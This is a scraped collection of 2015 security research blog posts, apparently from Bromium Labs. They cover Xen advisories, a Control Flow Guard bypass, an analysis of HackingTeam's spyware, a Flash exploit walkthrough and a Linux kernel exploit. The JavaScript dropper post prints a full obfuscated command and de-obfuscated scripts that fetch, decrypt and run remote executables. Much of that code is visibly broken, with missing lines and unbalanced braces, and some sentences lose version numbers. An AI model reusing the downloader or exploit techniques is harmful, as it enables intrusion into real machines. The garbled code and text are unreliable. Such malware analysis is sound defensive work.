Skip to content
November 3, 2015 / Rafal Wojtczuk

Xen security advisories from October 2015 and Bromium vSentry

Nine Xen hypervisor security advisories – XSA-145, XSA-146, XSA-147, XSA-148, XSA-149, XSA-150, XSA-151, XSA-152, XSA-153 were released on October 29. The good news is that none of them impact Bromium vSentry hypervisor. The most notable one is XSA-148:

XSA-148: x86: Uncontrolled creation of large page mappings by PV guests

This vulnerability allows a paravirtualized (PV) VM to access all memory on the system, including regions reserved for the hypervisor. This results in full compromise of the hypervisor. This is truly a critical vulnerability.
Bromium vSentry does not use PV VMs – instead, we use fully-virtualized (HVM) VMs. Therefore, this vulnerability does not impact vSentry.

Other XSAs are low severity denial of service problems. They do not affect vSentry, because our codebase has been trimmed and hardened. Some details (provided by Christian Limpach):

XSA-149: leak of main per-domain vcpu pointer array

vSentry does not use a separate dynamic allocation for the relevant data structures, therefore it is not vulnerable

XSA-150: x86: Long latency populate-on-demand operation is not preemptible

vSentry does not implement the relevant functionality, therefore it is not vulnerable

XSA-151: x86: leak of per-domain profiling-related vcpu pointer array

vSentry does not implement the relevant functionality, therefore it is not vulnerable

XSA-152: x86: some pmu and profiling hypercalls log without rate limiting

vSentry does not implement the relevant functionality, therefore it is not vulnerable

XSA-153: x86: populate-on-demand balloon size inaccuracy can crash guests

vSentry does not implement the relevant functionality, therefore it is not vulnerable

The remaining XSA-145, XSA-146 and XSA-147 are arm architecture specific, and therefore they do not impact vSentry.

September 28, 2015 / Rafal Wojtczuk

An interesting detail about Control Flow Guard

On Windows systems, before Windows 8.1 update 3, C code calling a function pointer used to be compiled to just a simple “call register” instruction; for example, in a 32bit process:

call esi

Starting with Windows 8.1 update 3, in all system libraries, it is more complicated:

mov ecx, esi
call ds:___guard_check_icall_fptr
call esi

This is how Control Flow Guard VC++ compiler feature works. Briefly, the ___guard_check_icall_fptr function checks whether the call target is a legal location – if it is not the beginning of a nonstatic function, ___guard_check_icall_fptr function aborts the execution. Therefore, attacker who controls a function pointer cannot immediately reach arbitrary code (say, “xchg eax, esp; ret” stack pivot gadget, that is always in a middle of a function). It significantly complicates exploiting of vulnerabilities based on heap corruption. All libraries and executables shipped with recent Windows systems (particularly, Internet Explorer) benefit from this protection.

With some effort, it is possible to get around this protection, as described by CORE Security here and by Yuki Chen here . Basicaly, these two papers mention two methods:

  1. call a legal function, that allows you to hijack control flow, e.g. NtContinue
  2. transit via code that is not compiled with CFG, e.g. flash JIT.

Now, after the above introduction, we are getting to the point of this post.

In some Windows 10 Technical Preview dlls, a function call is compiled into even more complicated assembly:

mov ebx, esp
mov ecx, edi
call ds:___guard_check_icall_fptr
call edi
cmp ebx, esp
jz short loc_6380DEF5
mov ecx, 4
int 29h
/* code after function call */

This code saves the stack pointer in ebx register, does the ___guard_check_icall_fptr
and the actual function call, and then checks that the stack pointer is unchanged (if it is changed, int 29h terminates the process). Why is this extra effort with esp checking needed?
Most likely, the answer is: to fix another CFG bypass method. I have not seen any explanation explicitely related to VC++ CFG (particularly, this detail is not covered in the papers mentioned above), but a very related technique can be found in the excellent “Out of Control” paper. In this paper, authors were able to bypass another solution that imposed restrictions on the control flow, by reaching the following code (simplified for readability):

push controlled_arg1
call eax [*] ; eax controlled by an attacker

The value of eax at the moment of the call had been checked to be in a certain set of functions (so no call to the middle of the function is allowed). The problem was that the set of allowed functions included both stdcall functions (that remove the arguments from the stack in their epilogue) and cdecl functions (that do not remove arguments from the stack). In the above disassembly, it is apparent that the target is meant to be a stdcall function. If we point eax to a cdecl function, then after it returns, the stack is desynchronized – on its top, instead of the return address, there is the attacker-controlled argument. Therefore, the “ret” instruction will transfer execution to the location of attacker’s choice.

On recent Windows 10 Technical Preview build, 32bit versions of ieframe.dll, jscript9.dll and mshtml.dll include this extra check for stack pointer sanity. However, other dlls do not have this check. Is there a suitable function in system libraries that we can transit through and achieve arbitrary EIP ?
I spent quite some time looking for a real life example (particularly, I wrote a scanner that tried each location in all dlls loaded by 32bit IE renderer) but I returned empty-handed. Admittedly, the requirements are strict – this function must not use frame pointer, and it must call a controllable function.

I had more luck with somewhat reversed approach – find a function that expects to call cdecl function pointer, and feed it a stdcall function. The jackpot (on a recent Windows 10 Technical Preview build, in syswow64 libraries) is: kernel32!Windows::Globalization::Calendars::YearMonthCalendar::AddEras. Its pseudocode is:

jackpot() {
indirect_call reg1; // checked with CFG; we control reg1
push controlled_value1 // argument to the below function call
indirect_call reg2; // checked with CFG; we control reg2
function epilogue

Here, reg1 was meant to point to a cdecl function. The trick is to point reg1 to a stdcall function, that will remove a few words from the stack, so that after its return, esp will point to jackpot’s saved return address. The “push controlled_value1” instruction will overwrite jackpot’s saved return address. reg2 should point to a cdecl function. Then, when returning, jackpot will transfer control to a location chosen by an attacker – for instance, to a stack pivot gadget.
Therefore, this “stack desynchronization” technique is another generic (and real life) method to bypass CFG; applicable for 32bit processes only. On 64bit architecture, it is always the caller who removes the call arguments from the stack (note that the first four arguments are passed in registers, but the additional arguments are passed on the stack) – so, no chance for the stack pointer to land in an unexpected location.

July 10, 2015 / Nick Cano

Government Grade Malware: a Look at HackingTeam’s RAT


Security researchers the world over have been digging through the massive HackingTeam dump for the past five days, and what we’ve found has been surprising. I’ve heard this situation called many things, and there’s one description that I can definitely agree with: it’s like Christmas for hackers.

“On the fifth day of Christmas Bromium sent to me a malware analysis B-L-O-G” – You

This is a very interesting situation we’ve found ourselves in. We have our hands on the code repositories of HackingTeam, and inside of them we’ve found the source code for a cross-platform, highly-featured, government-grade RAT (Remote Access Trojan). It’s rare that we get to do analysis of complex malware at the source-code level, so I couldn’t wait to write a blog about it!

The first thing I noticed when I dove into the repositories was a bunch of projects for “RCS Agents”, and each of these agents seems to be a malware core for the HackingTeam RAT called Remote Control System, or RCS.


Each of the cores is made for a different OS and, together, they comprise a multi-platform malware that works on Windows, Windows Phone, Windows Mobile, Mac OSX, iOS, Linux, Android, BlackBerry OS, and Symbian. In this blog, I’ll cover the core-win32 repository, but you can assume that the functionality in the Windows agent is present on every other platform.


The code in this repository makes up a 32-bit DLL that is injected system-wide on Windows, enabling the malware to exist in the process space of many potential target applications. There’s also a core-win64 repository that contains the tools to compile this DLL for 64-bit systems.

When the DLL is injected into a process, it will unlink itself from the PEB (Process Environment Block) module list and start an IPC channel to communicate with other instances of the malware and, ultimately, to a root instance that is responsible for talking to the C&C server.

Core Functionality

RCS contains dozens of run-of-the-mill spying tools, similar to the ones found in tools like Blackshades and DarkComet. Here’s a look at the source code:


From a quick glance, we can see a number of ‘interesting’ tools:

  • HM_Pstorage.h and HM_PWDAgent (folder): grabs stored passwords from Firefox, Internet Explorer, Opera, Chrome, Thunderbird, Outlook, MSN Messenger, Paltalk, Gtalk, and Trillian.
  • HM_IMAgent.h and HM_IMAgent (folder): records conversations from Skype, Yahoo IM (versions 7 through 10), MSN Messenger (versions 2009 through 2011, now discontinued), and ICQ (version 7 only).
  • HM_SocialAgent.h and Social (folder): grabs session cookies for Gmail, Facebook, Yahoo Mail, Outlook (web client), and Twitter from Firefox, Chrome, and IE.
  • HM_MailCap.h, HM_Contacts.h, HM_MailAgent (folder) and HM_ContactAgent (folder): captures emails and contacts from Outlook and Windows Live Mail.
  • HM_AmbMic.h and HM_MicAgent (folder): records ambient noise picked up by any attached microphones.
  • wcam_grab.h and wcam_grab.cpp: periodically snap and save photos from attached webcam.
  • HM_Clipboard.h: grabs any data that is stored on the clipboard.
  • HM_KeyLog.h: logs all keystrokes.
  • HM_MouseLoh.h: logs all mouse movements and clicks.
  • HM_UrlLog.h: records visited URLs in Firefox, Chrome, IE, and Opera.

There’s nothing really novel in the code, and the methods mostly utilize standard API calls. This functionality is pretty common in most RATs, but we should consider that most of these files were checked into the repository as early as 2011, meaning RCS may have pioneered some of these features.

Some closer analysis of the code reveals that RCS does have some rarer features, though. In HM_SkypeRecord.h and HM_SkypeACL (folder), for instance, we can see that they use the DirectSound API to capture active Skype calls and save the audio using the Speex codec.


Additionally, we see that RCS can monitor printed documents (HM_PrintPool.h) and even grab private keys, balances, and transactions from Bitcoin, Litecoin, Feathercoin, and Namecoin wallets (HM_Money.h).


Luckily for us Shibe fans, they don’t seem to monitor Dogecoin wallets.


RCS uses the WLAN (wireless LAN) API functions from WLANAPI.DLL to enumerate nearby WiFi hotspots. Many hotspots expose geolocation information and RCS looks for this information so it can determine where the infected machine is, even when it is hiding behind a VPN or proxy.


Lateral Movement

Since HackingTeam seems to have a stockpile of 0days for lateral movement, you would think RCS wouldn’t employ any features with that specific purpose. You’d be wrong, though. They seem to have an infector that can infect USB drives, phones running Windows Mobile, and VMWare disks. This infector is located in HM_PDAAgent.h.

The USB infector is pretty standard. RCS polls for new USB drives, drops an installer on them, and infects the autorun.inf file to run that installer.


The Windows Mobile infector works in much the same way, copying the malware from the core-winmobile repository to the phone as a file called autorun.exe. Afterwards, it drops an infected autorun.zoo file on the phone. All of this is done using functions from the standard Windows Phone API, RAPI.DLL.


The VMWare installer is a bit trickier. First, it will search for any VMWare disks (.vmdk) that aren’t in use. When it finds one, it will mount it to an open drive letter and then drop a RCS installer in either C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ (Windows 7 and above) or C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ (Windows XP). This code is a bit too bulky to post, but it starts on line 731 of HM_PDAAgent.h, in case you get your hands on the code and want to take a look.


RCS has a myriad of self-protection mechanisms, including AV detection, API call obfuscation, and API hook evasion. For starters, the AV detection is capable of detecting twenty-six different AV tools. Here’s a snippet from av_detect.h:


RCS detects these AVs either by looking for their drivers or checking the environment for certain variables. It’s smart enough to know which of its features will trigger alerts with which AVs, and will selectively disable features to remain hidden.


The malware also uses obfuscated API calls to prevent any form of static analysis from understanding what it is doing. In the file DynamiCall\obfuscated_calls.h, the malware has encoded strings that represent DLL names and API function names that it calls.


From there, DynamiCall\dynamic_import.h and DynamiCall\dynamic_import.cpp take care of decoding the strings, loading the DLLs, and resolving the addresses of the functions. Additionally, RCS has a set of API functions that it will only call if it can confirm that they aren’t being monitored: ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, CreateThread, GetProcAddress, VirtualAllocEx, GetWindowText, SendMessageTimeout, and VirtualProtectEx. Every time one of these functions is called, RCS will grab the DLL that contains the function, manual-map it into memory, locate the target function in the manually-mapped library, and copy the first five bytes from the manually-mapped library over the first five bytes of the function in the actual library. If any step in this process fails, the malware will not call the function. The code that does this is pretty bulky, but you can find it in HM_SafeProcedures.h, HM_SafeProcedures.cpp, HM_PreamblePatch.h, and HM_PreamblePatch.cpp.

One of the most telling pieces of code in the malware, though, is an unfinished snippet starting on line 48 of format_resistant.cpp, which suggests the team was developing a way for RCS to persist through UEFI infection. Though the code is unfinished, it is telling of their future ambitions.

Note: Other repositories also contain some kernel-mode rootkits to hide the malware, but this blog is already getting pretty beefy.

Closing Thoughts

HackingTeam’s RCS is a fully-featured RAT with the ability to intercept large amounts of personal information, record conversations, access cameras, propagate to peripheral devices, and do it all without triggering any alarms. The source-code shows that the malware was developed by a very ambitious team, and the repository logs make it clear that it was under active development. The implications this carries are huge, especially considering HackingTeam’s customer list.

July 7, 2015 / Nick Cano

Adobe Flash Zero Day Vulnerability Exposed to Public

For those paying attention to infosec news, it’s no secret that HackingTeam – a provider of exploits and malware to governments around the world – has been hacked. The hackers who hacked the hackers released a torrent with over 400GB of internal HackingTeam software, tools, write-ups, and, of course, 0-day exploits. One of the exploits we’ve come across was first exposed by the Twitter user @w3bd3vil, and is reminiscent of the “ActionScript-Spray” attack used in CVE-2014-0322 and first documented by Bromium researcher Vadim Kotov. In summary, CVE-2014-0322 used a UAF (user after free) vulnerability in Microsoft’s Internet Explorer to increase the size of an ActionScript Vector object, giving the attacker access to the heap of the process. HackingTeam’s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine.

Note: before diving in, let’s remember that this is not a weaponized 0day, but a PoC that HackingTeam provided to customers, so we don’t have any malicious payload to accompany it; only a simple calc.exe pop.

The UAF vulnerability is quite simple. First, it sprays the heap with multiple ByteArray objects and surrounds each one with MyClass2 objects.


Spraying ByteArray and MyClass2 instances into memory

This loop iterates 30 times, effectively filling up the Array object a like so:

for i 1 to 30:

a.insert(MyClass2 instance)

a.insert (ByteArray with length 0xfa0 [4000 bytes])

a.insert (MyClass2 instance)

This spray strategically allocates a chunk of two sequential pages next to each ByteArray object, setting up ActionScript’s memory manager for exploitation. Before I dive into the code that does the exploitation, I want to give you a 10,000 foot view of how the exploit works. When a class instance is placed inside of a ByteArray, ActionScript will attempt to call the class’ member function .valueOf(), which is expected to return the actual byte to insert into the ByteArray; this is where the magic happens. ActionScript internally stores the location to the target ByteArray slot before calling .valueOf(), and it places the returned value at the stored location. In order to exploit this behavior, the attack resizes the target ByteArray from inside of .valueOf(). This causes a new chunk of memory to be allocated for the ByteArray object, freeing the old memory. Before returning, .valueOf() allocates a Vector that matches the size of the old ByteArray object. With a bit of luck (hence the 30 tries), the memory manager places the new Vector object on the freed memory from the old ByteArray. Then, when .valueOf() returns, ActionScript will write the return value directly to the length field of new Vector.

The attack iterates backwards over the sprayed ByteArray objects in a, and attempts to trigger the UAF on each one using this method. Here’s what the implementation looks like:


Attempting to trigger the vulnerability condition on the sprayed ByteArray objects

After .valueOf() returns and the ByteArray is updated, the attack loops over the list of Vector objects that it allocated (stored in _va) and checks their size. If any Vector has a size that is not 0x3f0, it means that the exploit succeeded in partially over-writing the size with the byte 0x40.


Checking the newly-allocated vector objects to see if one was affected by the exploit

From there, the attack uses the same method that was used to write the payload in CVE-2014-0322. The attack treats the affected Vector as a pointer to the entire memory space of the program (well, not the entire memory, but all memory following the Vector). It uses this to scan memory for the PE header of KERNEL32.DLL and grabs the address of VirtualProtect from the export table. Next, it overwrites the VFT (virtual function table) of an internal class with the address of VirtualProtect, and calls the function to set the memory of the MyClass2 instance directly after the affected Vector to PAGE_EXECUTE_READWRITE. With the MyClass2 memory set to executable, the attack finishes by finally placing its shellcode payload within the MyClass2 instance and using the same VFT trick to execute it.

Out of the box, this exploit comes with shellcode for Windows (both 32 and 64 bit) and Mac OSX (64 bit only). According to the documentation present in the dump, this exploit should work with every version of Flash Player from version 9 until We’ve got it working internally with Flash Player 18 and Internet Explorer, which indicates this it is clearly a zero day risk to internet users today. Given legitimately sophisticated shellcode and mitigation bypass techniques similar to the ones documented by Bromium researcher Jared DeMott, this exploit has the potential to completely own almost any system that it hits, and can be reliably blocked by leveraging robust isolation technologies.

UPDATE 7/8/2015: It seems like Adobe has already released a patch for this vulnerability, and Flash Player versions and above should be protected.

June 12, 2015 / Vadim Kotov

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario the shellcode would download and execute a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. Droppers’ main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching would probably be process hallowing. Recently we found a couple of curious specimen that does not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of those lately. One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^<l.length;i++){v=h(m(2),l[i],k[0]);z=0;var s=g("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");f=a.GetTempName();s.Type=2;s.Charset="iso-8859-1";s.Open();d=v.charCodeAt(v.indexOf("PE\x00\x00")+23);x1=".\x65x\x65";s.WriteText(v);if(31^<d){z=1;f+=".dll"}else f+=x1;s.SaveToFile(f,2);z^&^&(f="regsvr32"+x1+" /s "+f);s.Close();"cmd"+x1+" /c "+f,0);w1.Sleep(u*2)}}}catch(q){}df();function r(k,e){for(var l=0,n,c=[],q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&255,l=l+c[b]^&255,n=c[b],c[b]=c[l],c[l]=n,q.push(String.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&255]));return q.join("")}function su(k,e){k.setRequestHeader("User-Agent",e)}function h(k,y,j){var e=g("WinHttp.WinHttpRequest.5.1");e.SetProxy(0);e.Open("\x47E\x54",y,0);su(e,k);e.Send();if(200==e.status)return r(e.responseText,j)}function df(){a.deleteFile(w1.ScriptFullName)}function g(k){return new ActiveXObject(k)};>wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

It’s actually a one liner that creates a JavaScript file and launches it using wscript. The de-obfuscated JavaScript code looks like this:

var w = new ActiveXObject("WScript.Shell"),
    a = new ActiveXObject("Scripting.FileSystemObject"),

try {
    rc4_key = WScript.Arguments(0)
    URL = WScript.Arguments(1)
    user_agent_string = WScript.Arguments(2)

    separator = "***";


    var n = request_and_decrypt(user_agent_string, URL, rc4_key);

    if (n.indexOf(separator) > 3) {
        k = n.split(separator);
        l = k[1].split(";");

        for (var i = 0; i < l.length; i++) {
            v = request_and_decrypt(user_agent_string, l[i], k[0]);
            is_dll = 0;
            var s = new ActiveXObject('ADODB.Stream');
            filename = a.GetTempName();
            s.Type = 2;
            s.Charset = "iso-8859-1";

            pe_chracteristics = v.charCodeAt(v.indexOf("PE\x00\x00") + 23);

            if (31 < pe_charactersistics) {
                is_dll = 1;
                filename += ".dll"
            } else {
                filename += ".exe";

            s.SaveToFile(filename, 2);

                filename = "regsvr32.exe /s " + filename);


  "cmd.exe /c " + filename, 0);




} catch (q) {}


function RC4_decrpyt(k, e) {
    for (var l = 0, n, c = [], q = [], b = 0; 256 > b; b++)c[b] = b;

    for (b = 0; 256 > b; b++) l = l + c[b] + e.charCodeAt(be.length) & 255, n = c[b], c[b] = c[l], c[l] = n;

    for (var p = l = b = 0; p < k.length; p++) b = b + 1 & 255, l = l + c[b] & 255, n = c[b], c[b] = c[l], c[l] = n, q.push(String.fromCharCode(k.charCodeAt(p) ^ c[c[b] + c[l] & 255]));

    return q.join("")


function request_and_decrypt(user_agent_string, URL, rc4_key) {

    var request = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    request.Open("GET", URL, 0);
    request.setRequestHeader("User-Agent", user_agent_string)

    if (200 == request.status)
        return RC4_decrpyt(request.responseText, rc4_key)


After 6-minute sleep the script will download an RC4 encrypted text file containing URLs of malware binaries. It decrypt the list and for each entry downloads, decrypts and executes the corresponding binary. The same RC4 key is used for all the downloads. Before launching a binary it checks the PE header to determine if it’s an EXE or a DLL. In ther former case it will issue:

cmd.exe /c .exe

in the latter:

regsvr32.exe /s .dll

After that the script will delete itself. We could assume certain benefits of this approach:

  1. It might trick some HIPS or pro-active AV modules
  2. The binaries are encrypted – therefore the chances of network detection are scarce
  3. The URLs of malicious binaries are not hardcoded – they are easily configurable

Interestingly we saw a similar dropper in an EXE as well. A fake Flash Player installer from hxxp:// is an EXE that shows clean on VirusTotal (permalink). It creates a JavaScript file and batch script. Here’s the de-obfuscated JavaScript:

(function(c) {
    function a(a, b) {
        if (!b || !a) return null;
        b = e["ExpandEnvironmentStrings"](b);
        var d = WScript.CreateObject("Msxml2.XMLhttp");"GET", a, !1);
        var c = new ActiveXObject("ADODB.Stream");
        with(c) return Mode = 3, Type = 1, Open(), Write(d["responseBody"]), SaveToFile(b, 2), Close(), b

    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application" );
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");

    a("", "%APPDATA%\\7winzip.exe");
    a("", "%APPDATA%\\wilndfiles");
    a("", "%APPDATA%\\wilndfile.cmd");
    a("", "%APPDATA%\\wilndfiler.cmd");

    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfile.cmd"', "", "runas", 0);
    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfiler.cmd"', "", "runas", 0);


It downloads 4 files from and notice that these are HTTPS connections again rendering traffic filters useless. The files are:

  1. exe – a instance of 7zip
  2. wilndfiles – a password protected 7z archive
  3. cmd – a batch script
  4. cmd – a batch script

After that it executes both scripts. First one unpacks the archive and launches malware, second – cleans up all the dropper related files. Is this method more beneficial than more traditional droppers? It appears so. Instead of making more sophisticated PE droppers it seems rational to just switch to JavaScript and use PE as a “dropper” for javascript. Given 0 positives on Virus Total it seems antiviruses do not scrutinize them too well. Of course VirusTotal doesn’t do justice to the antiviruses. Some of them have HIPS modules and various heuristics and could possibly detect it. But still none of them had a signature for this dropper, not even generic one and this should be alarming.

May 13, 2015 / Jared DeMott

The Floppies Won’t Eat Your Mouse

We heard tell of a mean ol’ venom on the street (CVE-2015-3456).  “Hey, give that back to Spidey.”


So we decided to have a look.  But we’re not talking about superheroes.  We’re talking about floppy.  Remember this fella?


He seems bummed out.  That’s because there’s not much need for him anymore.  Or so we thought.  Let’s give it over to the expert:


“Thank you Captain.  Indeed certain hypervisors may still include code, which enables the use of this primitive alien technology, known as the “floppy”.  As expected, federation level technologies (Bromium) removed such useless code to begin with.  (E.g. vSentry is not at all vulnerable.)

The source code file that holds the vulnerability is fdc.c.  Here is the detailed code flaw and fix:

Though it has not been observed, it appears that rogues with system level privileges in a VM could escape to host, if the vulnerable code were compiled in.  Estimating impact is non-trivial as always.  Most of the risk is in the cloud, and details about the exact compiled version of their hypervisor are unlikely to surface.  Either way, providers will react to this threat quickly.  Thus, real world impact is not expected at this time.”

Now back to our regularly scheduled program.

P.S. This bug was found by Jason Geffner – Great job!

April 1, 2015 / Nick Cano

The ABC’s of APT

Here at Bromium Labs, we’re always striving to further our knowledge of the rapidly-changing attack landscape that threatens our enterprise customers. Over the past few months, our dedicated team of researchers have collectively developed a severe chemical dependency on caffeine in search of a paradigm to clearly define this landscape in a way that could benefit the security community as a whole. What they came up with is truly groundbreaking, and will go down in history as “The ABC’s of APT.”

ABC's of APT

Image CopyWronged© By Bromium Labs

As we all know, the term APT refers to an “Advanced Persistent Threat.” In our research, we realized each APT has unique behavior, and casting them all under one umbrella can be a slippery slope towards people marrying their television sets. For this reason, we devised our own paradigm that strips the broad term “APT” from threat diagnoses and, instead, categorizes them using a more specialized spectrum. Surprisingly, this spectrum happens to encompasses twenty-six different distinct behaviors – each of which can be represented using one letter of the alphabet. And, thus, The ABC’s of APT were born. Without further blabbering, here’s our finished diagnosis table:

Read more…

March 12, 2015 / Vadim Kotov

Achievement Locked: New Crypto-Ransomware Pwns Video Gamers

Gamers may be used to paying to unlock downloadable content in their favorite games, but a new crypto-ransomware variant aims to make gamers pay to unlock what they already own. Data files for more than 20 games can be affected by the threat, increasing what is already a large target for cybercriminals. Another file type that hasn’t been targeted before is iTunes related. But first, let’s have a look at the initial infection.

Read more…

March 10, 2015 / Rafal Wojtczuk

The five Xen Security Advisories from March 2015 and Bromium vSentry

Five Xen hypervisor security advisories – XSA-120, XSA-121, XSA-122, XSA-123 and XSA-124 have been published recently. Let’s have a look how they relate to the Bromium vSentry hypervisor, uXen, that has been derived from Xen.

Summary of impact on uXen

XSA-120 – not vulnerable
XSA-121 – minor data disclosure
XSA-122 – minor data disclosure
XSA-123 – not vulnerable
XSA-124 – not vulnerable

XSA-120 and XSA-124

These vulnerabilities are related to PCI-passthrough functionality. If a malicious VM has been granted direct access to a PCI device, it can crash the host. Currently, in Bromium vSentry we do not pass any PCI devices to any VM, therefore these vulnerabilities are not relevant.


The code responsible for emulation of some hardware (e.g. real-time clock, interrupt controller) refuses to handle unexpected requests from the VM. Unfortunately, the upper layers of the emulator still return 4 bytes of uninitialized data to the VM, despite the fact that this location has not been filled by the lower layer of the code. This results in a limited information disclosure – four bytes from the hypervisor address space are disclosed to the VM. These four bytes reside in the hypervisor stack. Therefore, the impact is minimal – the only information useful for an attacker is the partial value of pointers residing on the stack. This is not interesting by itself, but it might be helpful when exploiting another (unrelated) vulnerability based on memory corruption, because it makes ASLR protection ineffective.
uXen is potentially vulnerable to this issue.


This issue is very similar to XSA-121. This time, limited information disclosure of the contents of the hypervisor’s stack occurs when handling the “xen_version” hypercall. The impact is also identical to XSA-121 (the difference is that more than 4 bytes can be disclosed).
uXen is potentially vulnerable to this issue.


This is the most interesting one of the four, because this is a hypervisor memory corruption. The discoverer’s analysis is here; the below independent analysis is essentially the same, with a few extra bits on the CPU0 case.
The vulnerability lies in the code responsible for instruction emulation. The Xen emulator maintains the following data structure (C union):
union {
/* OP_REG: Pointer to register field.*/
unsigned long *reg;
/* OP_MEM: Segment and offset. */
struct { enum x86_segment seg; unsigned long off; } mem;

If the instruction accesses memory, then the “mem” field of the union should be used. If the instruction accesses a register, then the “reg” pointer should be used – it points to the stored register on the hypervisor stack. The problem arises when Xen emulates an instruction that does not access memory, but is prefixed by the segment override prefix (naturally, such a combination does not make sense). In such case, the “reg” pointer is first initialized to a legal location, but then the “mem.seg” field is also written to. As both fields (“reg” and “seg”) share the same location (this is how C unions work), the result is that the “reg” pointer is corrupted. Subsequently, this pointer is read or written to with a controllable value.
The crucial limitation is that the “reg” pointer is 8 bytes long (assuming x86-64 architecture) and the “seg” field is 4 bytes long (unless “–short-enums” option is passed to the compiler, but it seems to not be the case at least by default). It means that only the low 4 bytes of “reg” can be controlled, and with a very limited range of values. The biggest possible value of “enum x86_segment” type, that can be a prefix, is 5. If the original value of “reg” was 0xXXXXXXXXYYYYYYYY, we can turn it to 0xXXXXXXXX0000000Z, where Z is in 0-5 range (and the high 32 bits are unchanged). Initially, the “reg” field points to the hypervisor stack. In order to understand the impact, we need to know the possible ranges of the hypervisor stack locations. The following information was gathered on Xen-4.4.1 x86-64 system (particularly, the file xen-4.4.1/xen/include/asm-x86/config.h is very helpful). There are two cases:
1) An attacker controls a VM that can run on physical CPU 0. The stack for CPU 0 resides in the Xen image bss section, so it is located at an address a bit higher than 0xffff82d080000000. After overwrite, this pointer will have the value 0xffff82d00000000Z (again, 0<=Z<=5). This virtual address is mapped and belongs to the compatibility machine-to-phys translation table. This data structure is used only for PV VMs (while the vulnerability can only be triggered from a HVM), therefore (most likely) an attacker needs to control both a PV VM and a HVM to proceed. Even in this case, it is unclear how an ability to control the first entry in machine-to-phys translation table can help an attacker.
2) An attacker controls a VM that cannot run on physical CPU 0. Hypervisor stacks for CPUs other than 0 are allocated on the Xen heap. The typical address of the stack top is 0xffff830000000000+physical_memory_size-something_small, because memory for CPU stacks are allocated early at the Xen boot time, from the top of physical memory (and all physical memory is mapped at the virtual address 0xffff830000000000). After the vulnerability is triggered, the “reg” pointer will have the value 0xffff830V0000000Z, where again 0<=Z<=5, and V=(int)(physical_memory_size_in_GB/4.0). This address is mapped to a single physical frame that can serve any purpose – e.g. can be used by dom0 kernel to store crucial pointers. However, it is nontrivial for a malicious VM to force the hypervisor to allocate this frame in a way that would result in reliable privilege escalation. On the other hand, uncontrolled memory corruption in another VM (limited to a single page) is likely.
The good news is that uXen is not vulnerable to this issue. We identified the Xen instruction emulator as a possible attack target a long time ago, and its functionality in uXen is severely limited. Particularly, uXen (when running a microVM) refuses to emulate an instruction with a segment override – if such an instruction is seen, the microVM is killed.

February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)


is described as follows:

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.
I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.
All experiments were conducted on Fedora 20 system, running 64bit 3.11.10-301 kernel; all the discussion is 64bit-specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode
    arbitrary code execution.

  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

Digression: kernel, usermode, iret

The vulnerability

In a few cases, when Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to bad_iret function, that does

     /* So pretend we completed the iret and took the #GPF in user mode.*/
     pushq $0
     jmp general_protection

As the comment explains, the subsequent code flow should be identical to the case when
general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP.

The problematic case is #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – “push” instruction generates a page fault that gets converted into double fault. I have not analysed this scenario; from now on, we focus on pre 3.16 kernel, with no “espfix”.

The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it.

Digression: swapgs instruction

When memory is accessed with gs segment prefix, like this:

mov %gs:LOGICAL_ADDRESS, %eax

the following actually happens:

  1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
  2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT.
